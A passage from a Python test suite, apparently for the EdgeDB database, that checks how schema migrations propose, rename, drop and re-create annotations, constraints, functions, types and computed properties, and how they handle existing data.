'DROP SCALAR TYPE test::EnumType02;'
)
}],
'prompt': (
"did you drop scalar type 'test::EnumType02'?"
),
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
WITH MODULE schema
SELECT ScalarType
FILTER .name = 'test::EnumType02';
''', [])
# Make sure that enum dropped cleanly by re-creating and
# using the enum again.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type EnumType02 extending enum<foo, bar>;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
"CREATE SCALAR TYPE test::EnumType02"
" EXTENDING enum<foo, bar>;"
)
}],
'prompt': "did you create scalar type 'test::EnumType02'?",
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result('''
SELECT <test::EnumType02>'foo';
''', ['foo'])
async def test_edgeql_migration_describe_annotation_01(self):
# Migration that renames an annotation.
await self.migrate('''
abstract annotation my_anno1;
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract annotation renamed_anno1;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT ANNOTATION test::my_anno1 '
'RENAME TO test::renamed_anno1;'
)
}],
},
})
async def test_edgeql_migration_describe_annotation_02(self):
# Migration that creates an annotation.
await self.con.execute('''
START MIGRATION TO {
module test {
abstract annotation my_anno2;
type AnnoType2 {
annotation my_anno2 := 'test_my_anno2';
}
};
};
''')
await self.con.execute('''
CREATE TYPE test::AnnoType2;
''')
await self.assert_describe_migration({
'confirmed': [
'CREATE TYPE test::AnnoType2;'
],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT ANNOTATION test::my_anno2;'
)
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
# Migration that drops an annotation.
await self.con.execute('''
START MIGRATION TO {
module test {
type AnnoType2;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER TYPE test::AnnoType2 {\n'
' DROP ANNOTATION test::my_anno2;\n'
'};'
)
}],
},
})
# Auto-complete migration
await self.con.execute('''
ALTER TYPE test::AnnoType2 {
DROP ANNOTATION test::my_anno2;
};
''')
await self.assert_describe_migration({
'complete': False,
'proposed': {
'statements': [{
'text': (
'DROP ABSTRACT ANNOTATION test::my_anno2;'
)
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
# Make sure that annotation dropped cleanly by re-creating and
# using the annotation.
await self.con.execute('''
START MIGRATION TO {
module test {
abstract annotation my_anno2;
type AnnoType2 {
annotation my_anno2 := 'retest_my_anno2';
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT ANNOTATION test::my_anno2;'
)
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value,
},
} FILTER .name = 'test::AnnoType2';
""",
[{
'name': 'test::AnnoType2',
'annotations': [{
'name': 'test::my_anno2',
'@value': 'retest_my_anno2',
}]
}],
)
async def test_edgeql_migration_describe_constraint_01(self):
# Migration that renames a constraint.
await self.migrate('''
abstract constraint my_oneof(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
type Foo {
property note -> str {
constraint my_oneof(["foo", "bar"]);
}
}
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint my_one_of(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
type Foo {
property note -> str {
constraint my_one_of(["foo", "bar"]);
}
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT CONSTRAINT test::my_oneof '
'RENAME TO test::my_one_of;'
)
}],
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_describe_constraint_02(self):
# Migration that renames a link constraint.
# Honestly I'm not sure if link constraints can really be
# anything other than exclusive?
await self.migrate('''
abstract constraint my_exclusive() extending std::exclusive;
type Foo;
type Bar {
link foo -> Foo {
constraint my_exclusive;
}
}
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint myexclusive() extending std::exclusive;
type Foo;
type Bar {
link foo -> Foo {
constraint myexclusive;
}
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT CONSTRAINT test::my_exclusive '
'RENAME TO test::myexclusive;'
)
}],
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_describe_constraint_03(self):
# Migration that renames a object constraint.
await self.migrate('''
abstract constraint my_oneof(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
type Foo {
property a -> str;
property b -> str;
constraint my_oneof(["foo", "bar"])
ON (__subject__.a++__subject__.b);
}
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint my_one_of(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
type Foo {
property a -> str;
property b -> str;
constraint my_one_of(["foo", "bar"])
ON (__subject__.a++__subject__.b);
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT CONSTRAINT test::my_oneof '
'RENAME TO test::my_one_of;'
)
}],
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_describe_constraint_04(self):
# Migration that creates a constraint.
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint my_one_of(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
scalar type my_str extending str {
constraint my_one_of(['my', 'str']);
};
};
};
''')
await self.con.execute('''
CREATE SCALAR TYPE test::my_str EXTENDING std::str;
''')
await self.assert_describe_migration({
'confirmed': [
'CREATE SCALAR TYPE test::my_str EXTENDING std::str;'
],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT CONSTRAINT test::my_one_of('
'one_of: array<anytype>) {\n'
' USING (std::contains(one_of, __subject__));\n'
'};'
),
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.con.query('DECLARE SAVEPOINT migration_01')
await self.assert_query_result(
r"""
SELECT <test::my_str>'my';
""",
['my'],
)
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r"invalid my_str"):
await self.con.execute(r"""
SELECT <test::my_str>'nope';
""")
await self.con.query('ROLLBACK TO SAVEPOINT migration_01')
# Migration that drops a constraint.
await self.con.execute('''
START MIGRATION TO {
module test {
scalar type my_str extending str;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
"ALTER SCALAR TYPE test::my_str {\n"
" DROP CONSTRAINT test::my_one_of(['my', 'str']);\n"
"};"
),
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT <test::my_str>'my';
""",
['my'],
)
await self.assert_query_result(
r"""
SELECT <test::my_str>'nope';
""",
['nope'],
)
# Test that dropping constraint was clean with a migration
# that re-creates a constraint.
await self.con.execute('''
START MIGRATION TO {
module test {
abstract constraint my_one_of(one_of: array<anytype>) {
using (contains(one_of, __subject__));
};
scalar type my_str extending str {
constraint my_one_of(['my2', 'str2']);
};
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'CREATE ABSTRACT CONSTRAINT '
'test::my_one_of(one_of: array<anytype>) {\n'
' USING (std::contains(one_of, __subject__));\n'
'};'
),
}],
},
})
# Auto-complete migration
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT <test::my_str>'my2';
""",
['my2'],
)
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r"invalid my_str"):
await self.con.execute(r"""
SELECT <test::my_str>'my';
""")
async def test_edgeql_migration_describe_abs_ptr_01(self):
await self.migrate('''
abstract link abs_link;
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract link new_abs_link;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT LINK test::abs_link '
'RENAME TO test::new_abs_link;'
)
}],
},
})
async def test_edgeql_migration_describe_function_01(self):
await self.migrate('''
function foo(x: str) -> str using (SELECT <str>random());
''')
await self.con.execute('''
START MIGRATION TO {
module test {
function bar(x: str) -> str using (SELECT <str>random());
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER FUNCTION test::foo(x: std::str) '
'{RENAME TO test::bar;};'
)
}],
},
})
async def test_edgeql_migration_function_01(self):
await self.migrate('''
type Note {
required property name -> str;
}
function hello_note(x: Note) -> str {
USING (SELECT x.name)
}
''')
async def test_edgeql_migration_function_02(self):
await self.migrate('''
type Foo;
function foo(x: Foo) -> int64 {
USING (SELECT 0)
}
''')
await self.migrate('''
type Bar;
function foo(x: Bar) -> int64 {
USING (SELECT 0)
}
''')
await self.con.execute('''
DROP FUNCTION test::foo(x: test::Bar);
''')
async def test_edgeql_migration_function_03(self):
await self.migrate('''
type Foo;
function foo(x: Foo) -> int64 {
USING (SELECT 0)
}
''')
await self.migrate('''
type Bar;
function foo2(x: Bar) -> int64 {
USING (SELECT 0)
}
''')
await self.con.execute('''
DROP FUNCTION test::foo2(x: test::Bar);
''')
async def test_edgeql_migration_function_04(self):
await self.migrate('''
function foo() -> str USING ('foo');
''')
await self.start_migration('''
function foo() -> str USING ('bar');
''')
await self.interact([
"did you alter function 'test::foo'?"
])
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT test::foo()
""",
["bar"],
)
async def test_edgeql_migration_function_05(self):
await self.migrate("""
type Person {
required property name -> str {
constraint exclusive;
}
multi link places_visited -> Place;
}
type Place {
required property name -> str {
constraint exclusive;
}
}
function visited(person: str, city: str) -> bool
using (
WITH person := (SELECT Person FILTER .name = person),
SELECT city IN person.places_visited.name
);
""")
async def test_edgeql_migration_constraint_01(self):
await self.migrate('''
abstract constraint not_bad {
using (__subject__ != "bad" and __subject__ != "terrible")
}
type Foo {
property foo -> str {
constraint not_bad;
}
}
type Bar extending Foo;
''')
await self.start_migration('''
abstract constraint not_bad {
using (__subject__ != "bad" and __subject__ != "awful")
}
type Foo {
property foo -> str {
constraint not_bad;
}
}
type Bar extending Foo;
''')
await self.interact([
"did you alter abstract constraint 'test::not_bad'?"
])
await self.fast_forward_describe_migration()
async with self.assertRaisesRegexTx(
edgedb.ConstraintViolationError,
"invalid foo",
):
await self.con.execute(r"""
INSERT test::Foo { foo := "awful" };
""")
async def test_edgeql_migration_describe_type_rename_01(self):
await self.migrate('''
type Foo;
type Baz {
link l -> Foo;
};
''')
await self.con.execute('''
START MIGRATION TO {
module test {
type Bar;
type Baz {
link l -> Bar;
};
}
};
POPULATE MIGRATION;
''')
await self.assert_describe_migration({
'complete': True,
'confirmed': [
'ALTER TYPE test::Foo RENAME TO test::Bar;'
],
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_computed_01(self):
await self.migrate(r'''
type Foo {
property val -> str;
property comp := count((
# Use an alias in WITH block in a computable
WITH x := .val
# Use an alias in SELECT in a computable
SELECT y := Bar FILTER x = y.val
))
}
type Bar {
property val -> str;
}
''')
await self.con.execute("""
SET MODULE test;
INSERT Foo {val := 'c'};
INSERT Foo {val := 'd'};
INSERT Bar {val := 'a'};
INSERT Bar {val := 'b'};
INSERT Bar {val := 'c'};
INSERT Bar {val := 'c'};
""")
await self.assert_query_result(
r"""
SELECT Foo {
val,
comp,
} ORDER BY .val;
""",
[{
'val': 'c',
'comp': 2,
}, {
'val': 'd',
'comp': 0,
}],
)
async def test_edgeql_migration_computed_02(self):
await self.migrate(r'''
type Foo { property foo := '1' };
type Bar extending Foo;
''')
await self.migrate(r'''
type Foo { property foo := 1 };
type Bar extending Foo;
''')
async def test_edgeql_migration_computed_03(self):
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := Tweet;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.con.execute("""
INSERT Tweet {
text := 'Hello',
author := (
INSERT User {name := 'Alice'}
)
};
INSERT Tweet {
text := 'Hi',
author := (
INSERT User {name := 'Billie'}
)
};
""")
# Validate our structures
await self.assert_query_result(
r"""
SELECT Tweet {
text,
author: {
name
},
} ORDER BY .text;
""",
[{
'text': 'Hello',
'author': {
'name': 'Alice'
},
}, {
'text': 'Hi',
'author': {
'name': 'Billie'
},
}],
)
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := User.<author[IS Tweet];
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := .<author[IS Tweet];
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
SELECT Tweet FILTER .author = User
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
WITH U := User
SELECT Tweet FILTER .author = U
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
WITH U := DETACHED User
SELECT Tweet FILTER .author = U
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
WITH U := User
SELECT U.<author[IS Tweet]
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hi'
}],
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi link tweets := (
WITH User := DETACHED User
SELECT User.<author[IS Tweet]
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets: {
text
} ORDER BY .text,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}, {
'name': 'Billie',
'tweets': [{
'text': 'Hello'
}, {
'text': 'Hi'
}],
}],
)
async def test_edgeql_migration_computed_04(self):
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := Tweet.text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.con.execute("""
INSERT Tweet {
text := 'Hello',
author := (
INSERT User {name := 'Alice'}
)
};
INSERT Tweet {
text := 'Hi',
author := (
INSERT User {name := 'Billie'}
)
};
""")
# Validate our structures
await self.assert_query_result(
r"""
SELECT Tweet {
text,
author: {
name
},
} ORDER BY .text;
""",
[{
'text': 'Hello',
'author': {
'name': 'Alice'
},
}, {
'text': 'Hi',
'author': {
'name': 'Billie'
},
}],
)
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello', 'Hi'},
}, {
'name': 'Billie',
'tweets': {'Hello', 'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := User.<author[IS Tweet].text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := .<author[IS Tweet].text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
SELECT Tweet FILTER .author = User
).text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
WITH U := User
SELECT Tweet FILTER .author = U
).text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
WITH U := DETACHED User
SELECT Tweet FILTER .author = U
).text;
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello', 'Hi'},
}, {
'name': 'Billie',
'tweets': {'Hello', 'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
WITH U := User
SELECT U.<author[IS Tweet].text
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello'},
}, {
'name': 'Billie',
'tweets': {'Hi'},
}],
)
await self.migrate(r'''
type User {
property name -> str;
multi property tweets := (
WITH User := DETACHED User
SELECT User.<author[IS Tweet].text
);
}
type Tweet {
property text -> str;
link author -> User;
}
''', module='default')
await self.assert_query_result(
r"""
SELECT User {
name,
tweets,
} ORDER BY .name;
""",
[{
'name': 'Alice',
'tweets': {'Hello', 'Hi'},
}, {
'name': 'Billie',
'tweets': {'Hello', 'Hi'},
}],
)
async def test_edgeql_migration_computed_05(self):
await self.migrate(r'''
type Bar {
multi link foo := Foo;
property name -> str;
};
type Foo {
link bar -> Bar;
property val -> str;
};
''', module='default')
await self.con.execute("""
INSERT Foo {
val := 'foo0',
bar := (
INSERT Bar {name := 'bar0'}
),
};
INSERT Foo {
val := 'foo1',
bar := (
INSERT Bar {name := 'bar1'}
),
};
""")
await self.assert_query_result(
r"""
SELECT Foo {
val,
bar: {
name,
foo: {
val
} ORDER BY .val,
},
} ORDER BY .val;
""",
[{
'val': 'foo0',
'bar': {
'name': 'bar0',
'foo': [{'val': 'foo0'}, {'val': 'foo1'}],
},
}, {
'val': 'foo1',
'bar': {
'name': 'bar1',
'foo': [{'val': 'foo0'}, {'val': 'foo1'}],
},
}],
)
async def test_edgeql_migration_computed_06(self):
await self.migrate(r'''
type Bar {
multi property foo := Foo.val;
property name -> str;
};
type Foo {
link bar -> Bar;
property val -> str;
};
''', module='default')
await self.con.execute("""
INSERT Foo {
val := 'foo0',
bar := (
INSERT Bar {name := 'bar0'}
),
};
INSERT Foo {
val := 'foo1',
bar := (
INSERT Bar {name := 'bar1'}
),
};
""")
await self.assert_query_result(
r"""
SELECT Foo {
val,
bar: {
name,
foo,
},
} ORDER BY .val;
""",
[{
'val': 'foo0',
'bar': {
'name': 'bar0',
'foo': {'foo0', 'foo1'},
},
}, {
'val': 'foo1',
'bar': {
'name': 'bar1',
'foo': {'foo0', 'foo1'},
},
}],
)
async def test_edgeql_migration_reject_prop_01(self):
await self.migrate('''
type User {
property foo -> str;
};
''')
await self.start_migration('''
type User {
property bar -> str;
};
''')
await self.interact([
("did you rename property 'foo' of object type "
"'test::User' to 'bar'?", "n"),
# XXX: or should this be split up?
"did you alter object type 'test::User'?"
])
await self.fast_forward_describe_migration()
async def test_edgeql_migration_reject_prop_02(self):
await self.migrate('''
type User {
required property foo -> str;
};
''')
await self.start_migration('''
type User {
property bar -> str;
};
''')
# Initial confidence should *not* be 1.0 here
res = json.loads(await self.con.query_single(
'DESCRIBE CURRENT MIGRATION AS JSON;'))
self.assertLess(res['proposed']['confidence'], 1.0)
await self.interact([
("did you rename property 'foo' of object type 'test::User' to "
"'bar'?", "n"),
# XXX: or should this be split up?
"did you alter object type 'test::User'?"
])
await self.fast_forward_describe_migration()
async def test_edgeql_migration_reject_prop_03(self):
await self.migrate('''
type User {
required property foo -> str;
};
''')
await self.start_migration('''
type User {
required property bar -> int64;
};
''')
await self.interact([
# Or should this be split into rename and reset optionality?
("did you create property 'bar' of object type 'test::User'?",
"n"),
("did you rename property 'foo' of object type 'test::User' to "
"'bar'?"),
("did you alter the type of property 'bar' of object type "
"'test::User'?",
"y",
"<int64>.bar"),
])
await self.fast_forward_describe_migration()
async def test_edgeql_migration_reject_prop_04(self):
await self.migrate('''
type Foo;
type Bar;
''')
await self.start_migration('''
type Foo;
type Bar extending Foo;
''')
await self.interact([
("did you alter object type 'test::Bar'?", "n"),
"did you drop object type 'test::Bar'?",
"did you create object type 'test::Bar'?",
])
await self.fast_forward_describe_migration()
@test.xfail('Fails to rebase because the type is mismatched')
async def test_edgeql_migration_reject_prop_05(self):
await self.migrate('''
scalar type Slug extending str;
abstract type Named {
required property name -> Slug;
};
type User {
required property name -> str;
};
''')
await self.start_migration('''
scalar type Slug extending str;
abstract type Named {
required property name -> Slug;
};
type User extending Named;
''')
await self.interact([
("did you drop property 'name' of object type 'test::User'?", "n"),
], check_complete=False)
await self.fast_forward_describe_migration()
async def test_edgeql_migration_force_delete_01(self):
await self.migrate('''
type Base;
type Foo;
type Bar { link foo -> Foo; };
''')
await self.start_migration('''
type Base;
type Foo extending Base;
type Bar { link foo -> Foo; };
''')
await self.interact([
("did you alter object type 'test::Foo'?", "n"),
"did you drop link 'foo' of object type 'test::Bar'?"
], check_complete=False)
await self.fast_forward_describe_migration()
async def test_edgeql_migration_force_delete_02(self):
await self.migrate('''
type Base;
type Foo;
type Bar extending Foo;
''')
await self.start_migration('''
type Base;
type Foo extending Base;
type Bar extending Foo;
''')
await self.interact([
("did you alter object type 'test::Foo'?", "n"),
"did you drop object type 'test::Bar'?"
], check_complete=False)
await self.fast_forward_describe_migration()
async def test_edgeql_migration_eq_01(self):
await self.migrate("""
type Base;
""")
await self.con.execute("""
SET MODULE test;
INSERT Base;
""")
# Try altering the schema to a state inconsistent with current
# data.
with self.assertRaisesRegex(
AssertionError,
r"Please specify an expression to populate existing objects "
r"in order to make property 'name' of object type 'test::Base' "
r"required"
):
await self.migrate("""
type Base {
required property name -> str;
}
""")
# Migration without making the property required.
await self.migrate("""
type Base {
property name -> str;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
name
};
""",
[{
'name': None,
}],
)
await self.con.execute("""
UPDATE
Base
SET {
name := 'base_01'
};
""")
await self.assert_query_result(
r"""
SELECT Base {
name
};
""",
[{
'name': 'base_01',
}],
)
# Inherit from the Base, making name required.
await self.migrate("""
type Base {
property name -> str;
}
type Derived extending Base {
overloaded required property name -> str;
}
""")
await self.con.execute("""
INSERT Derived {
name := 'derived_01'
};
""")
await self.assert_query_result(
r"""
SELECT Base.name;
""",
{'base_01', 'derived_01'},
)
async def test_edgeql_migration_eq_02(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
type Derived extending Base {
overloaded required property foo -> str;
}
""")
await self.con.execute("""
SET MODULE test;
INSERT Base {
foo := 'base_02',
};
INSERT Derived {
foo := 'derived_02',
};
""")
await self.migrate(r"""
type Base {
# rename 'foo'
property foo2 -> str;
}
type Derived extending Base {
overloaded required property foo2 -> str;
}
""")
# the data still persists
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
foo2,
} ORDER BY .foo2;
""",
[{
'__type__': {'name': 'test::Base'},
'foo2': 'base_02',
}, {
'__type__': {'name': 'test::Derived'},
'foo2': 'derived_02',
}],
)
async def test_edgeql_migration_eq_03(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
type Derived extending Base {
overloaded required property foo -> str;
}
""")
await self.con.execute("""
SET MODULE test;
INSERT Base {
foo := 'base_03',
};
INSERT Derived {
foo := 'derived_03',
};
""")
await self.migrate(r"""
type Base;
# drop 'foo'
type Derived extending Base {
# completely different property
property foo2 -> str;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
[IS Derived].foo2,
} ORDER BY .foo2;
""",
[{
'__type__': {'name': 'test::Base'},
'foo2': None,
}, {
'__type__': {'name': 'test::Derived'},
'foo2': None,
}],
)
async def test_edgeql_migration_eq_04(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
type Derived extending Base;
type Further extending Derived {
overloaded required property foo -> str;
}
""")
await self.con.execute("""
SET MODULE test;
INSERT Base {
foo := 'base_04',
};
INSERT Derived {
foo := 'derived_04',
};
INSERT Further {
foo := 'further_04',
};
""")
await self.migrate(r"""
type Base;
# drop 'foo'
type Derived extending Base;
type Further extending Derived {
# completely different property
property foo2 -> str;
};
""")
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
[IS Further].foo2,
} ORDER BY .__type__.name;
""",
[{
'__type__': {'name': 'test::Base'},
'foo2': None,
}, {
'__type__': {'name': 'test::Derived'},
'foo2': None,
}, {
'__type__': {'name': 'test::Further'},
'foo2': None,
}],
)
async def test_edgeql_migration_eq_06(self):
await self.migrate(r"""
type Base {
property foo -> int64;
}
type Derived extending Base {
overloaded required property foo -> int64;
}
""")
await self.con.execute("""
SET MODULE test;
INSERT Base {
foo := 6,
};
""")
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
foo,
};
""",
[{
'__type__': {'name': 'test::Base'},
# the value was correctly inserted
'foo': 6,
}],
)
await self.migrate(r"""
type Base {
property foo -> float64;
}
type Derived extending Base {
overloaded required property foo -> float64;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
foo,
};
""",
[{
'__type__': {'name': 'test::Base'},
'foo': 6.0,
}],
)
async def test_edgeql_migration_eq_07(self):
await self.con.execute("""
SET MODULE test;
""")
await self.migrate(r"""
type Child {
required property name -> str {
constraint exclusive;
}
}
type Base {
required property name -> str;
link bar -> Child;
}
""")
await self.con.execute('''
INSERT Child { name := 'c1' };
INSERT Child { name := 'c2' };
INSERT Base {
name := 'b1',
bar := (SELECT Child FILTER .name = 'c1'),
};
INSERT Base {
name := 'b2',
};
''')
await self.assert_query_result(
r"""
SELECT Base {
bar: {
name
}
} ORDER BY .name;
""",
[{
'bar': {
'name': 'c1',
},
}, {
'bar': None,
}],
)
await self.migrate(r"""
type Child {
required property name -> str {
constraint exclusive;
}
}
type Base {
required property name -> str;
required link bar -> Child {
# add a constraint
constraint exclusive;
}
}
""", user_input=[
"SELECT Child FILTER .name = 'c2'"
])
await self.assert_query_result(
r"""
SELECT Base {
bar: {
name
}
} ORDER BY .name;
""",
[{
'bar': {
'name': 'c1',
},
}, {
'bar': {
'name': 'c2',
},
}],
)
async def test_edgeql_migration_eq_08(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'very_long_test_str_base_08',
};
""")
# Try altering the schema to a state inconsistent with current
# data.
new_state = r"""
type Base {
property foo -> str {
# add a constraint
constraint max_len_value(10);
}
}
"""
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r"foo must be no longer than 10 characters"):
await self.migrate(new_state)
# Fix the data.
await self.con.execute(r"""
UPDATE Base
SET {
foo := 'base_08',
};
""")
# Migrate to same state as before now that the data is fixed.
await self.migrate(new_state)
await self.assert_query_result(
r"""
SELECT Base {
foo,
};
""",
[{
'foo': 'base_08',
}],
)
async def test_edgeql_migration_eq_09(self):
await self.migrate(r"""
scalar type constraint_length extending str {
constraint max_len_value(10);
}
type Base {
property foo -> constraint_length;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'b09',
};
""")
# Try altering the schema to a state inconsistent with current
# data.
new_state = r"""
scalar type constraint_length extending str {
constraint max_len_value(10);
# add a constraint
constraint min_len_value(5);
}
type Base {
property foo -> constraint_length;
}
"""
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r'Existing test::Base\.foo values violate the new constraint'):
await self.migrate(new_state)
# Fix the data.
await self.con.execute(r"""
UPDATE Base
SET {
foo := 'base_09',
};
""")
